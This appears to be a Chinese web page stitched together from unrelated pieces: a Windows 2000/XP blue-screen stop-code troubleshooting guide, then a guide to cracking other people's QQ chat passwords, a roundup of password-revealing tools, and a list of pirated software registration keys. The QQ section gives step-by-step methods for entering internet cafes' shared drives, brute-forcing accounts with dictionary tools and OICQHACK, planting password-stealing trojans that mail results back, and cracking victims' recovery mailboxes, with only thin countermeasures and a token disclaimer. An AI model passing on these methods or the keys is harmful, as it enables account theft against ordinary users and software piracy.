Windows 2K/XP蓝屏故障检查信息
1:***STOP 0x0000001E(0xC0000005,0xFDE38AF9,0x0000001,0x7E8B0EB4)
KMODE_EXCEPTION_NOT_HANDLED ***
其中错误的第一部分是停机码(Stop Code)也就是STOP 0x0000001E用于识别已发生错误的类型, 错误第二部分是被括号括起来的四个数字集,表示随机的开发人员定义的参数(这个参数对于普通用户根本无法理解,只有驱动程序编写者或者微软操作系统的开发人员才懂),第三部分是错误名,信息第一行通常用来识别生产错误的驱动程序或者设备。这种信息多数很简洁,但停机可以作为搜索项在微软知识库和其他技术资料中使用。Windows 2K/XP蓝屏信息非常多, 但他们产生的原因往往集中在不兼容的硬件和驱动程序、有问题的软件、病毒等,因此为大家提供了一些常规的解决方案, 在遇到蓝屏错误时应先对照这些方案进行排除。
(1):重启;
(2):检查新硬件是否插牢,并安装最新的驱动程序,同时还应对照微软网站的硬件兼容类别检查一下硬件是否与操作系统兼容,如果你的硬件没有在表中, 那么就得到硬件厂商网站进行查询;
(3):新驱动和新服务:如果刚安装完某个硬件的新驱动,或安装了某个软件, 而它又在系统服务中添加了相应项目(比如:杀毒软件、CPU降温软件、防火墙软件等), 在重启或使用中出现了蓝屏故障,请到安全模式来卸载或禁用它们;
(4):检查病毒:比如冲击波和振荡波等病毒有时会导致Windows蓝屏死机,因此查杀病毒必不可少。同时一些木马间谍软件也会引发蓝屏,所以最好再用相关工具进行扫描检查;
(5):检查BIOS和硬件兼容性:对于新装的电脑经常出现蓝屏问题,应该检查并升级BIOS到最新版本,同时关闭其中的内存相关项。比如:缓存和映射,另外,还应该对照微软的硬件兼容列表检查自己的硬件,还有就是,如果主板BIOS无法支持大容量硬盘也会导致蓝屏, 需要对其进行升级;
(6):检查系统日志:在开始-->菜单中输入:EventVwr.msc,回车出现"事件查看器", 注意检查其中的"系统日志"和"应用程序日志"中表明"错误"的项;
(7):查询停机码:把蓝屏中密密麻麻的E文记下来,接着到其他电脑中上网,进入微软帮助与支持网http://support.microsoft.com,在左上角的"搜索(知识库)"中输入停机码, 如果搜索结没有适合信息,可以选择"英文知识库"在搜索一遍,一般情况下, 会在这里找到有用的解决案例。另外,在baidu、Google等搜索引擎中使用蓝屏的停机码或者后面的说明文字为关键词搜索,往往也会有以外的收获;
(8):最后一次正确配置:一般情况下, 蓝屏都出现于更新了硬件驱动或新加硬件并安装其驱动后, 这时Windows 2K/XP提供的最后一次正确配置就是解决蓝屏的快捷方式。重启系统,在出现启动菜单时按下F8键就会出现高级启动选项菜单,接着选择"最后一次正确配置“;
(9):安装最新的系统补丁和Service Pack:有些蓝屏是Windows本身存在缺陷造成的,应此可通过安装最新的系统补丁和Service Pack来解决。
Windows XP的硬件兼容列表:http://support.microsoft.com/defaul...kb;zh-cn;314062
Windows 2K的硬件兼容类别:http://winqual.microsoft.com/download/display.asp?
FileName=hcl/Win2000HCL.txt
2:0x0000000A:IRQL_NOT_LESS_OR_EQUAL
错误分析:主要是由问题的驱动程序、有缺陷或不兼容的硬件与软件造成的. 从技术角度讲. 表明在内核模式中存在以太高的进程内部请求级别(IRQL)访问其没有权限访问的内存地址。
解决方案:请用前面介绍的解决方案中的2、3、5、8、9方案尝试排除。
3:0x00000012:TRAP_CAUSE_UNKNOWN
错误分析:如果遇到这个错误信息,那么很不幸,应为KeBudCheck分析的结果是错误原因未知。
解决方案:请仔细回想这个错误是什么时候出现的; 第一次发生时你对系统做了哪些操作; 发生时正在进行什么操作,从这些信息中找出可能的原因,从而选择相应解决方案尝试排除。
4:0x0000001A:MEMORY_MANAGEMENT
错误分析:这个内存管理错误往往是由硬件引起的,比如, 新安装的硬件、内存本身有问题等。
解决方案:如果是在安装Windows时出现,有可能是由于你的电脑达不到安装Windows的最小内存和磁盘要求。
5:0x0000001E:KMODE_EXCEPTION_NOT_HANDLED
错误分析:Windows内核检查到一个非法或者未知的进程指令, 这个停机码一般是由问题的内存或是与前面0x0000000A相似的原因造成的。
解决方案:
(1)硬件兼容有问题:请对照前面提到的最新硬件兼容性列表,查看所有硬件是否包含在该列表中。
(2)有问题的设备驱动、系统服务或内存冲突和中断冲突; 如果在蓝屏信息中出现了驱动程序的名字,请试着在安装模式或者故障恢复控制台中禁用或删除驱动程序, 并禁用所有刚安装的驱动和软件,如果错误出现在系统启动过程中,请进入安全模式, 将蓝屏信息中所标明的文件重命名或者删除。
(3)如果错误信息中明确指出Win32K.sys: 很有可能是第三方远程控制软件造成的, 需要从故障恢复,控制台中将对该软件的服务关闭.
(4)在安装Windows后第一次重启时出现:最大嫌疑可能时系统分区的磁盘空间不足或BIOS兼容有问题。
(5)如果是在关闭某个软件时出现的:很有可能时软件本省存在设计缺陷,请升级或卸载它。
6:0x00000023:FAT_FILE_SYSTEM
0x00000024:NTFS_FILE_SYSTEM
错误分析:0x00000023通常发生在读写FAT16或者FAT32文件系统的系统分区时,而0x00000024则是由于NTFS.sys文件出现错误(这个驱动文件的作用是容许系统读写使用NTFS文件系统的磁盘),这两个蓝屏错误很有可能是磁盘本身存在物理损坏,或是中断要求封包(IRP)损坏而导致的。其他原因还包括:硬盘磁盘碎片过多;文件读写操作过于频繁,并且数据量非常达或者是由于一些磁盘镜像软件或杀毒软件引起的。
解决方案:首先打开命令行提示符,运行"Chkdsk /r"(注:不是CHKDISK,感觉象这个,但是……)命令检查并修复硬盘错误,如果报告存在怀道(Bad Track), 请使用硬盘厂商提供的检查工具进行检查和修复。
第二步,接着禁用所有即使扫描文件的软件,比如,杀毒软件、防火墙或备份工具。
第三步:右击C; winnt syst drivers fastfat.sys文件并选择"属性",查看其版本是否与当前系统所使用的Windows版本相符.(注:如果是XP, 应该是C: windows syst drivers fastfat.sys)。
第四步:安装最新的主板驱动程序, 特别IDE驱动,如果你的光驱、可移动存储器也提供有驱动程序,最好将它们升级至最新版。
7:0x00000027:RDR_FILE_SYSTEM
错误分析:这个错误产生的原因很难判断,不过Windows内存管理出了问题很可能会导致这个停机码的出现。
解决方案:如果是内存管理的缘故,通常增加内存会解决问题。
8:0x0000002EATA_BUS_ERROR
错误分析:系统内存存储器奇偶校验产生错误,通常是因为有缺陷的内存(包括物理内存、二级缓存或者显卡显存)时设备驱动程序访问不存在的内存地址等原因引起的。另外,硬盘被病毒或者其他问题所损伤,以出现这个停机码。
解决方案:
(1)检查病毒;
(2)使用"chkdsk /r"命令检查所有磁盘分区;
(3)用Memtest86等内存测试软件检查内存;
(4)检查硬件是否正确安装, 比如:是否牢固、金手指是否有污渍。
9:0x00000035:NO_MORE_IRP_STACK_LOCATIONS
错误分析:从字面上理解,应该时驱动程序或某些软件出现堆栈问题,其实这个故障的真正原因应该时驱动程序本省存在问题,或是内存有质量问题。
解决方案:请使用前面介绍的常规解决方案中与驱动程序和内存相关的方案进行排除。
10:0x0000003F:NO_MORE_SYSTEM_PTES
错误分析:一个与系统内存管理相关的错误,比如:由于执行了大量的输入/输出操作,造成内存管理出现问题:有缺陷的驱动程序不正确地使用内存资源;某个应用程序(比如:备份软件)被分配了大量的内核内存等。
解决方案:卸载所有最新安装的软件(特别是哪些增强磁盘性能的应用程序和杀毒软件)和驱动程序。
11:0x00000044:MULTIPLE_IRP_COMPLIETE_REQUESTS
错误分析:通常是由硬件驱动程序引起的。
解决方案:卸载最近安装的驱动程序,这个故障很少出现,目前已经知道的是,在使用
http://www.in-system.com/这家公司的某些软件时会出现,其中的罪魁就是Falstaff.sys文件。
12:0x00000050AGE_FAULT_IN_NONPAGED+AREA
错误分析:有问题的内存(包括屋里内存、二级缓存、显存)、不兼容的软件(主要是远程控制和杀毒软件)、损坏的NTFS卷以及有问题的硬件(比如CI插卡本身已损坏)等都会引发这个错误。
解决方案:请使用常规解决方案中与内存、软件、硬件、硬盘等相关的方案进行排除。
13:0x00000051:REGISTRY_ERROR
错误分析:这个停机码说明注册表或系统配置管理器出现错误,由于硬盘本身有物理损坏或文件系统存在问题,从而造成在读取注册文件时出现输入/输出错误。
解决方案:使用"chkdsk /r"检查并修复磁盘错误。
14:0x00000058:FTDISK_INTERNAL_ERROR
错误分析:说明在容错集的主驱动发生错误。
解决方案:首先尝试重启电脑看是否能解决问题,如果不行, 则尝试"最后一次正确配置"进行解决。
15:0x0000005E:CRITICAL_SERVICE_FAILED
错误分析:某个非常重要的系统服务启动识别造成的。
解决方案:如果是在安装了某个新硬件后出新的, 可以先移除该硬件,并通过网上列表检查它是否与Windows 2K/XP兼容,接着启动电脑,如果蓝屏还是出现,请使用"最后一次正确配置"来启动Windows。如果这样还是失败, 建议进行修复安装或是重装。
16:0x0000006F:SESSION3_INITIALIZATION-FAILED
错误分析:这个错误通常出现在Windows启动时,一般是由有问题的驱动程序或损坏的系统文件引起的。
解决方案:建议使用Windows安装光盘对系统进行修复安装。
17:0x00000076ROCESS_HAS_LOCKED_PAGES
错误分析:通常是因为某个驱动程序在完成了一次输入/输出操作后, 没有正确释放所占有的内存。
解决方案:1、点击开始-->运行:regedt32,找到[HKLM SYSTEM Currentcontrol set control sessionmanager memory management],在右侧新建双字节值"TrackLockedPages", 值为1,这样Windows便会在错误再次出现时跟踪到是哪个驱动程序的问题。2、如果再次出现蓝屏, 那么错误信息会变成:STOP:0x0000000CB(0xY,0xY,0xY,0xY)DRIVER_LEFT_LOCKED_PAGES_IN_PROCESS,其中第四个"0xY"会显示为问题驱动程序的名字,接着对其进行更新或删除。最后进入注册表,删除添加的"TrackLockedPages"。
18:0x00000077:KERNEL_STACK_INPAGE_ERROR
错误分析:说明需要使用的内核数据没有在虚拟内存或物理内存中找到,这个错误常常于是着磁盘有问题,相应数据损坏或受到病毒侵蚀。
解决方案:使用杀毒软件扫描系统,使用"chkdsk /r"命令检查并修复磁盘错误,如不行则使用磁盘厂商提供的工具检查修复。
19:0x0000007A:KERNEL_DATA_INPAGE_ERROR
错误分析:这个错误往往是虚拟内存中的内核数据无法读入内存造成的,原因可能是虚拟内存页面文件中存在坏簇、病毒、磁盘控制器出错、内存有问题。
解决方案:首先用升级为最新病毒库杀毒软件查杀病毒,如果促无信息中还有0xC000009C或0xC000016A代码,那么表示是坏簇造成的,并且系统的磁盘检测工具无法自动修复,这时要进入"故障恢复控制台",用"chkdsk /r"命令进行手动修复。
20:0x0000007B:INACESSIBLE_BOOT_DEVICE
错误分析:Windows在启动过程中无法访问系统分区或启动卷,一般发生在更换主板后第一次启动时,主要是因为新主板和旧主板的IDE控制器使用了不同芯片组造成的,有时也可能是病毒或硬盘损伤所引起的。
解决方案:一般只要用安装光盘启动电脑,然后执行修复安装即可解决问题,对于病毒则可使用DOS版的杀毒软件进行查杀(主战有kv2005DOS版下载)。如果是硬盘本身存在问题,请将其安装到其他电脑中, 然后使用"chkdsk /r"来检查并修复磁盘错误。
21:0x0000007E:SYSTEM_THREAD_EXCEPTION_NOT_HANDLED
错误分析:系统进程产生错误, 但Windows错误处理器无法捕获,其产生原因很多, 包括:硬件兼容性、有问题的驱动程序或系统服务、 或者是某些软件。
解决方案:请使用"事件查看器"来获取更多的信息,从中发现错误根源。
22:0x0000007F:UNEXPECTED_KERNEL_MOED_TRAP
错误分析:一般是由于有问题的硬件(比如:内存)或某些软件引起的,有时超频也会产生这个错误。
解决方案:用检测软件(比如:Memtest86)检查内存,如果进行了超频,请取消超频, 将PCI硬件插卡从主板插槽拔下来,或更换插槽,另外,有些主板(比如:nForce2主板)在进行超频后,南桥芯片过热也会导致蓝屏,此时为该芯片单独增加散热片往往可以有效解决问题。
23:0x00000080:NMI_HARDWARE_FAILURE
错误分析:通常是有硬件引起的。
解决方案:如果最近安装了新硬件,请将其移除,然后试试更换插槽和安装最新的驱动程序,如果升级了驱动程序,请恢复后原来的版本;检查内存金手指是否有污染和损坏, 扫描病毒;运行"chkdsk/r"检查并修复磁盘错误;检查所有硬件插卡已经插牢, 如果以上尝试都无效果,就得找专业的电脑维修公司请求帮助了。
24:0x0000008E:KERNEL_MODE_EXCEPTION_NOT_HANDLED
错误分析:内核级应用程序产生了错误, 但Windows错误处理器没有捕获, 通常是硬件兼容性错误。
解决方案:升级驱动程序或升级BIOS。
25:0x0000009C:MACHINE_CHECK_EXCEPTION
错误分析:通常是硬件引起的, 一般是因为超频或是硬件存在问题(内存、CPU、总线、电源)。
解决方案:如果进行了超频,请降会CPU原来频率,检查硬件。
26:0x0000009FRIVER_POWER_STATE_FAILURE
错误分析:往往与电源有关系,常常发生在与电源相关的操作,比如:关机、待机或休睡。
解决方案:重装系统,如果不能解决,请更换电源。
27:0x000000A5:ACPI_BIOS_ERROR
错误分析:通常是因为主板BIOS不能全面支持ACPI规范。
解决方案:如果没有相应BIOS升级,那么可在安装Windows 2K/XP时,当出现"press F6 if you need to install a third-party SCSI or RAID driver"提示时,按下F7键,这样Windows便会自动禁止安装ACPI HAL,而安装 Standard PC HAL。
28:0x000000B4:VIDEO_DRIVER_INIT_FAILURE
错误分析:这个停止信息表示Windows因为不能启动显卡驱动,从而无法进入图形界面,通常是显卡的问题,或者是存在与显卡的硬件冲突(比如:与并行或串行端口冲突)。
解决方案:进入安全模式查看问题是否解决,如果可以,请升级最新的显卡驱动程序,如果还不行则很可能是显卡与并行端口存在冲突,需要在安全模式按下WIN+break组合键打开"系统属性", 在硬件-->设备管理器中找到并双击连接打印的LPT1端口的项,在"资源"选项卡中取消"使用自动配置"的构选,然后将"输入/输出范围"的"03BC"改为"0378"。
29:0x000000BE:ATTEMPTED_WRITE_TO_READONLY_MEMORY
错误分析:某个驱动程序试图向只读内存写入数据造成的,通常是在安装了新的驱动程序,系统服务或升级了设备的固件程序后。
解决方案:如果在错误信息中包含有驱动程序或者服务文件名称,请根据这个信息将新安装的驱动程序或软件卸载或禁用。
30:0x000000C2:BAD_POOL_CALLER
错误分析:一个内核层的进程或驱动程序错误地试图进入内存操作,通常是驱动程序或存在BUG的软件造成的。
解决方案:请参考前面介绍的常规解决方案相关项目进行排除。
31:0x000000CERIVER_UNLOADED_WITHOUT_CANCELLING_PENDING_OPERATIONS
错误分析:通常是由有问题的驱动程序或系统服务造成的。
解决方案:请参考前面介绍的常规解决方案相关项目进行排除。
32:0x000000D1RIVER_IRQL_NOT_LESS_OR_EQUAL
错误分析:通常是由有问题的驱动程序引起的(比如罗技鼠标的Logitech MouseWare 9.10和9.24版驱动程序会引发这个故障),同时,有缺陷的内存、 损坏的虚拟内存文件、 某些软件(比如多媒体软件、杀毒软件、备份软件、DVD播放软件)等也会导致这个错误。
解决方案:检查最新安装或升级的驱动程序(如果蓝屏中出现"acpi.sys"等类似文件名,可以非常肯定时驱动程序问题)和软件;测试内存是否存在问题;进入"故障恢复控制台", 转到虚拟内存页面文件Pagefile.sys所在分区, 执行"del pagefile.sys"命令,将页面文件删除, 然后在页面文件所在分区执行chkdsk /r"命令;进入Windows后重新设置虚拟内存。如果在上网时遇到这个蓝屏,而你恰恰又在进行大量的数据下载和上传(比如:网络游戏、BT下载), 那么应该是网卡驱动的问题, 需要升级其驱动程序。
33:0x000000EA:THREAD_STUCK_IN_DEVICE_DRIVER
错误分析:通常是由显卡或显卡驱动程序引发的。
解决方案:先升级最新的显卡驱动,如果不行, 则需要更换显卡测试故障是否依然发生。
34:0x000000ED:UNMOUNTABLE_BOOT_VOLUME
错误分析:一般是由于磁盘存在错误导致的,有时也建议检查硬盘连线是否接触不良,或是没有使用合乎该硬盘传输规格的连接线,例如ATA-100仍使用ATA-33的连接线,对低速硬盘无所谓,但告诉硬盘(支持ATA-66以上)的要求较严格,规格不对的连线有时也会引起这类没办法开机的故障。如果在修复后,还是经常出现这个错误,很可能是硬盘损坏的前兆。
解决方案:一般情况下,重启会解决问题,不管怎么样都建议执行"chkdsk /r"命令来检查修复硬盘。
35:0x000000F2:HARDWARE)INTERRUPT_STORM
错误分析:内核层检查到系统出现中断风暴,比如:某个设备在完成操作后没有释放所占用的中断通常这是由缺陷的驱动程序造成的。
解决方案:升级或卸载最新安装的硬件驱动程序。
36:0x00000135:UNABLE_TO_LOCATE_DLL
错误分析:通常表示某个文件丢失或已经损坏,或者是注册表出现错误。
解决方案:如果是文件丢失或损坏,在蓝屏信息中通常会显示相应的文件名,你可以通过网络或是其他电脑找到相应的文件,并将其复制到系统文件夹下的SYSTEM32子文件夹中。如果没有显示文件名,那就很有可能是注册表损坏,请利用系统还原或是以前的注册表备份进行恢复。
37:0x0000021A:STATUS_SYSTEM_PROCESS_TERMINATED
错误分析:用户模式子系统,例如Winlogon或客服服务运行时子系统(CSRSS)已损坏, 所以无法再保证安全性,导致系统无法启动。有时,当系统管理员错误地修改了用户帐号权限,导致其无法访问系统文件和文件夹。
解决方案:使用"最后一次正确的配置",如果无效,可使用安装光盘进行修复安装。
38:STOP 0xC0000221 or STATUS_IMAGE_CHECKSUM_MISMATCH
错误分析:通常是由于驱动程序或系统DLL文件损坏造成的,一般情况下,在蓝屏中会出现文件名称。
解决方案:
(1)使用Windows安装光盘进行修复安装;
(2)如果还能进入安全模式,可以"开始-->运行": sfc /scannow
(3)还可以采用提取文件的方法来解决,进入"故障恢复控制台",使用copy或expand命令从光盘中复制或解压受损的文件,不过, 蓝屏一般都是驱动程序文件的问题,所以expand命令会用的都一些,比如:蓝屏中提示tdi.sys文件,因为驱动文件一般在i386 driver压缩包里,所以使用:expand %CDROM: i386 driver.cab f:tdi.sys c: winnt system drivers.(xp为expand %CDROM: i386 driver.cab f:tdi.sys c: windowns system drivers)。
39:如果启动时出现下述蓝屏停机码时:
如果在Windows启动时出现蓝屏,并出现附件一中的错误信息,那么多半时硬件出现了问题, 请用硬件厂商提供的诊断工具来判断硬件是否存在问题,并到其网站查看是否有最新的BIOS或固件更新程序。如果硬件没有问题,重装Windows 2K/XP, 若相同问题还是出现,就只能求助专业的技术支持了。
如果遇到的时附件二中的错误信息,也只有重装Windows了, 如果不能解决问题,建议求救专业的技术支持。
QQ密码破解与对策全攻略一、本地破解,方法:这个办法的首要条件是你所在的机器开过你想要的QQ号,这又分两种情况,一是你所在的机器真的曾经开过这个号码,二是通过共享入侵得到你想要的号码的整个目录,把它拷贝到你的OICQ的目录下,启动OICQ你就能在号码选择下拉列表中看到这个号码了。共享入侵请参看本站黑客教程之 对共享主机的简单入侵 ,网上硬盘共享最多的就是网吧和公司,而前者的硬盘里存有大量的QQ号码,只要你能进去且它的OICQ目录或它所在的分区是共享的话,自己慢慢挑吧。但是网上的IP多如牛毛,如何知道这个IP是网吧的呢,站长推荐本站聊天工具中的一个工具: WhoCQII FULL版,这个东东能让你探查一段指定IP地址里所开的OICQ,如果有哪一个IP打开了一串QQ,十有八九这就是网吧了,这时候你可以用本站网络监控中的 飘叶网际隧道1.0 ,这个工具是专门用来入侵网络共享硬盘的,使用它你必须安装Microsoft网络用户,使你的桌面上有一个网上邻居,且必须安装NETBEUI等协议,即可接入对等网。输入它的IP,再输入你所猜测的共享名,也就是它所共享分区或目录的名字,如果对了的话,恭喜你,你进去了,选择你要的号码吧!
下一步就是破解了,破解密码最常用的办法是穷举,也就是暴力破解了。你可以从本站密码破解下一个暴力破解器。我推荐 Pw Check 1.02 ,这个软件虽说是破解共享软件注册码的,其实就是一个暴力破解器,使用方法:首先在按键一和按键二都选择Enter,保存设置,然后读取一个字典,打开OICQ,选择你想破解的号码,随意输入一个密码,选登录,它会弹出一个对话框“输入密码与上次成功登录的密码不一致,是否到服务器验证”(除了你运气好得没话说,一次对了,这个对话框就不会出现 ^-^)选“否”,然后在“请再次输入登录密码”对话框的空白处按下*键,就开始破解了,再次按*键停止。停止后可以保存进度,以便下次可以继续进度,字典输入完后会自动停止。这个工具免费注册。 破解密码要用到字典,还有网友来信问我什么是字典,你真是!@#$%,字典是你所猜测密码的组合,格式通常为DIC,TXT,一行一个,破解器会逐行取出测试,直到密码正确和字典用完为止。这里你可以用本站字典工具中的 万能钥匙 ,它是一个符合中国人习惯的字典生成机。
生成的字典大小最好不要大于10Mb,要是字典过大可以用分割软件将其分成几个部分。否则容易死机!
对策:
从上面知道,破解密码通常是穷举。不要用简单的英文和纯数字作为密码,应该是大小写、数字、符号的混合,不要少于八位,这样的话密码就不容易被破了。再有就是网吧最好不要把重要的分区和文件夹共享出来,比如:C:\、OICQ、FOXMAIL......
二、在线破解
方法:
在线破解QQ密码的工具叫OICQHACK,本站密码破解有这个工具和它的注册机,未注册前扫描模式与号码列表模式将被禁用。注册方法参看压缩包内readme,这里我就不赘述了。运行OICQHACK后界面如下:From: [10001] To:[10009]
此栏为扫描的 OICQ 号码范围,选中 [V] Scan Mode 即可开启扫描模式进行多号码探测,缺省为单个号码探测模式.
注意:扫描模式第一轮密码是低速探测,因此会较慢;之后将自动开启高速扫描智能跳过不存在的空号,探测速度最高可达每秒100次.
Uin File: [Uin.dic]
此栏填写OICQ号码列表文件路径以及文件名,号码列表文件格式请参照 uin.dic ,选中 [V] Uin File即可开启号码文件列表模式,读取列表文件中OICQ号码进行密码探测.
Dict Path: [Password.dic]
此栏填写密码字典路径以及文件名,密码列表文件格式请参照 password.dic ,选中 [V] Password File即可开启密码字典模式,进行常用密码探测,缺省为 Brute Force 暴力破解.
[V] 0123456789
[. .] abcdefghijklmnopqrstuvwxyz
[. .] ABCDEFGHIJKLMNOPQRSTUVWXYZ
[. .] .,;:?!+-*/@$#%&|\~`^'"_<>()[]{}
此处选取 Brute Force 密码范围.
Password Length: [3]
此处选取 Brute Force 密码长度.
注意:以下设置建议使用默认值.
Max Threads: [ 16 ]
最大并发连接线程数,与探测速度和超时错误率成正比,取值视机器性能而定.
Timeout: [ 32 ]
超时等待时间,单位秒,与超时错误率和探测速度成反比,取值视你的耐心而定.
SP: 既非扫描模式也非号码文件列表模式的单号码探测由于受到服务器登陆时间限制会很慢,只能达到每秒1次,因此应尽量将待测号码做成列表文件进行批量探测。在批量扫描探测加密码字典模式下适当选取线程超时值能提高效率,最快可高达每秒100次.
这个工具同样需要字典穷举!
对策:
同样是密码设定和长度的问题,密码够长,且是大小写、符号、数字的组合,你的密码就相对安全些!
三、另类破解
1、使用工具
方法:
本站聊天工具中有一个工具叫:OICQ密码瞬间破解器 V1.02 它能破解出本地各OICQ号码的最后一个使用密码,只要该号码曾经选择过“下次登陆不显示登陆框”参数。软件即可以在瞬间得到这个QQ密码!
对策: 登录时不要选择“保存密码”
2、使用木马
方法:
在被害人的机器上运行木马的客户端,它就能自行记录每位登录者的OICQ号码和它的密码。有的木马能把结果发回你的信箱,如:Get Oicq Password,有的要你回到该机器查看记录文件,如:KillOicq 0.1,oicqmima,Oicq密码记录器,OICQ 潜伏者单机版 Beta 1.2,蜘蛛OICQPass beta 1......以
上工具都能在本站聊天工具找到。
对策:
防范当然是第一的,不要运行来历不明的软件(本站的除外,呵呵)Get Oicq Password木马的查杀工具叫KILLGOP,本站聊天工具中有。其他的木马可以试试Ctrl+Alt+Del查看进程,发现可疑的立即杀掉,还有的木马不会在进程栏里显示出来,这就关系到注册表了,请参看本站黑客教程中的几篇关于木马的文章。
3、使用邮箱
方法:
因为腾讯验证密码时要用到你的邮箱,它会把密码发回注册这个号码时所填的邮箱里。所以破解邮箱也不失为一个好办法。通常别人的个人资料里所填的邮箱就是他的验证邮箱。看中了他的号码吗,破掉他的邮箱密码吧。站长推荐的工具是密码破解中的 Tetrp FTP/POP Passwd Trier,这是一个专门用于破解邮箱的工具,也是暴力破解,同样要用到字典。
对策:
个人资料里和你申请号码时所填的mail地址不要一样,除非你对你的密码很有信心。选择一个好密码也是一个好办法!
方法大致就是以上这些,本文只被授权用于取回使用者遗失的OICQ密码,严禁用于破解他人帐号,否则一切后果由使用者自己承担。因本人的水平有限,难免遗漏,还请各路高手指点!
30秒破解所有密码
案例一:强力查\"*\"工具
打开软件后,将\"X\"图标,直接拖曳到需要查看密码的窗口中就可以了
下载地址: http://work.newhua.com/cfan/200622/xpass.zip
案例二:丢失的ADSL密码
dialupass的使用方法很简单,简单到你只要一运行,就能看到电脑中保存的拨号密码了
下载地址: http://work.newhua.com/cfan/200622/dialupass.rar
我不是ADSL的所以没显示。。哦。。。没有也可以建一个。。。哈哈。。。。刷QB的时候应
该很多用途吧
案例三:找到系统管理员的密码
系统里面有很多帐号,如果经常不用就会忘记了,对于这部分密码,要找回来,同样非常麻烦。Mr.cfan
就把network password recovery 推荐给大家吧。
将软件和汉化包解压至相同目录,运行后就能看到当前系统中的所有帐号信息了。
下载地址:http://www.nirsoft.net/utils/netpass.zip
汉化包:http://www.nirsoft.net/utils/trans/netpass_schinese.zip
案例四:让系统对我透明
若是所以的\"*\"都现出原形,是不是会让你觉得很方便呢?也不顾用拖曳图标了,想看就看,让系统密码
完全“透明”。这可是Mr.cfan强力推荐的软件。同样将软件和汉化包解压至相同目录,运行后,系统就
会自动变得的“透明”,同时,所有“透明”化处理过的程序都会被收集起来
下载地址:http://www.nirsoft.net/utils/astlog.zip
汉化包:http://www.nirsoft.net/utils/trans/astlog_schinese.zip
奇怪,我打开什么信息都没有
案例五:5秒内破解Word/Excel密码
千万别以为你把DOC、XLS文档加了个密码,就万事OK了,现在的软件只要几秒就可以将这些密码摧毁!
要掌握快速破解文档密码的关键是要下载到Office Password Remover 。然后你要做的就是连上网。点
两下鼠标,点击“文件名”后的“打开”按钮,选择加密的文件,然后按下“移除密码”,这时软件会自
动连网(看来前提是你的计算机已经连网了)寻找密钥。如果网速够快,只要几秒
种就会生成没有密码的新文件了。软件在联网的时候会自动发送一些文件头数据,不会泄露你的隐私,
可以放心时使用。
下载地址:http://work.newhua.com/cfan/200622/opr.rar
我自己先新建一个加密doc,,再用这个工具打开。。。
点移除密码。。。它会提示连接服务器。。。等一下就会在桌面生成一个解密过的文件
如果你担心隐私暴露,那么Advanced office password 是你破解office文档密码的另一选择。
下载地址:http://www.onlinedown.net/soft/37776.htm
案例六:破解60种软件的隐藏密码
现在很多软件都采用了密码加密后,保存在文件中的做法,比如flashfxp.outlook 等等,要破解这些加
密方式,最好的办法就是用Multi Password Recovery。它能破解密码的软件达60多种,可以通过
Readme.txt查看到。运行软件后,需要稍等几分钟,软件会自动扫描系统并列出系统信息及部分软件的
密码,如果还需要对其他密码进行破解。点击工具栏的“向导”按钮,然后选择破解的软件,并根据
提示选择软件保存密码文件的数据,就可以了
下载地址:http://www.newhua.com/soft/51824.htm
这个软件功能还真多
案冽七:恢复任意FTP客户端的FTP密码
如你忘记了FTP客户端中保存的N多FTP密码,用上了面的方法都不成了,那恢复起来可是件麻烦事了。只
有用FTP Password Recovery 来解决了。软件是用采用后台监听的方式读取FTP帐户信息的。
第一步:打开软件后,运行FTP客户端。
第二步:将要得到密码的FTP站点及端口号修改为127.0.01 和21
第三步:然后就可以在FTP Password Recovery中看到密码的结果了。
下载地址:http://work.newhua.com/cfan/200622/fpr.zip
(如果出现缺少MSWINSCK.OCX的提示,可以从
http://www.gsmblog.com/freeware/vblib/mswinsck.zip
下载,将其中的文件解压至
c;windows/sysytems32,再运行regsvr32 mswinsck.ocx,就可以运行了)
案例八:找回RAR的密码
你以为用了RAR压缩后,再传送文件时,就会万无一失了吗?。。如果你的密码过于简单,会立刻被
RAR KEY 所破解。打开RAR KEY ,点击“recover”按钮,软件就会自动开始破解。默认软件会使用暴露
破解,使用的是字母及数字,如果需要修改,可以点击工具栏中的settings按钮,在symbol set标签下进
行设置。如果要使用字典破解。只要在Dictionary 标签下勾选Enable dictionary attack并设置好字典
文件就可以了。
下载地址:http://www.newhua.com/soft/9756.htm
刊登内容下载使用过程中注意使用查杀软件查杀
最起码看看有没有*其他恶意插件 !!
2009全破解注册码(不看准后悔)
数码大师:F1589U3642MG13500AP99062WYULS689.
网络电视王:TV1-JMRCUF268F51F4DF4DF4DC54E60
网络电视小精灵:WJUQ-132282
轻轻松松写简历:注册码:3114。用户名:311100211005798
豪杰8vsp1 手机码 r6rt 手机号:13562957521
注册名:8UYNIUE895
注册码:12WD-1UDI-YOWU-2635
正版号放心使用。
还原精灵2009注册码
yuan-vrt5-tq3q-v8w8-n36s
保证能用啊 因为我一直用着
还原精灵注册码:YUAN-VRT6-3GEF-M8QD-C938 ,需原版盘安装。
兔子IE修复专家注册码:iepcn-yrkoy-fgjse-udfge-ynrel
PS 8.0 CE
1045-0131-1554-2369-4114-4703
1045-1764-6294-8326-8703-0029
PS 8.0 TDA版
1045-1466-2426-6353-8316-8316
注册表终结者v6.4 Name crsky Code 369241065
多功能日历v4.70 系列号 SOFT123456 注册码 JHDEE22-237KKKL-PYTSCAL
Windows定时关机系统v2.1 用户名 yzez 注册码 232212212
按键精灵v2.65 Name crsky Code 953f2f58ad392967
精装友情通讯录v2004build0101 Name 34520 Code 7636k4x804zf7836!
交通法规模拟考试系统V2.0 用户名 LJWBH 注册码 9ahcQjLRYbe00z5
填词大亨v2.85 Name crsky Code JLCBR-HWE84YHOOH-977FS
绿鹰PC万能精灵v2.87 用户名 eghostuser00002050 注册码 Ht5rvEEEjBYVV7B7KV
易通仓库管理v3.3 注册码 823617987831819
聪明宝宝健康成才指南v1.0 用户名 yzez 注册码 2cdc8dabb6e861ccf379c28b9e3360cd
多功能日历V4.8 序列号 SOFT88888 注册码 JDLEE12-897JKQR-PYTSCAL
注册表终结者v6.5 Name crsky Code 369241065
座右铭v1.2 注册码 g7z5x2r9
家庭多媒体中心V1.0 序列号 natty love sugar
CDpop光驱软键v1.0 注册码 1111-726666
智能卸载v2.0 用户名 随便 注册码 zn3is-bidl2-ape31
GIF2SWF2.5汉化版 Name crsky Code 16062291
传华通讯录2004.1 注册名 TFW 软件ID 12345678 序列号 1234567890 注册码 LOOEIDOHKNDKHNJ
IE至尊保护器2004.1 用户名 yzez ID号 9999999999 序列号 12345678 注册码 NKMLILILINNFMHF
我爱学数学V1.0 用户名 yzez 注册码 loyzez74yzezng
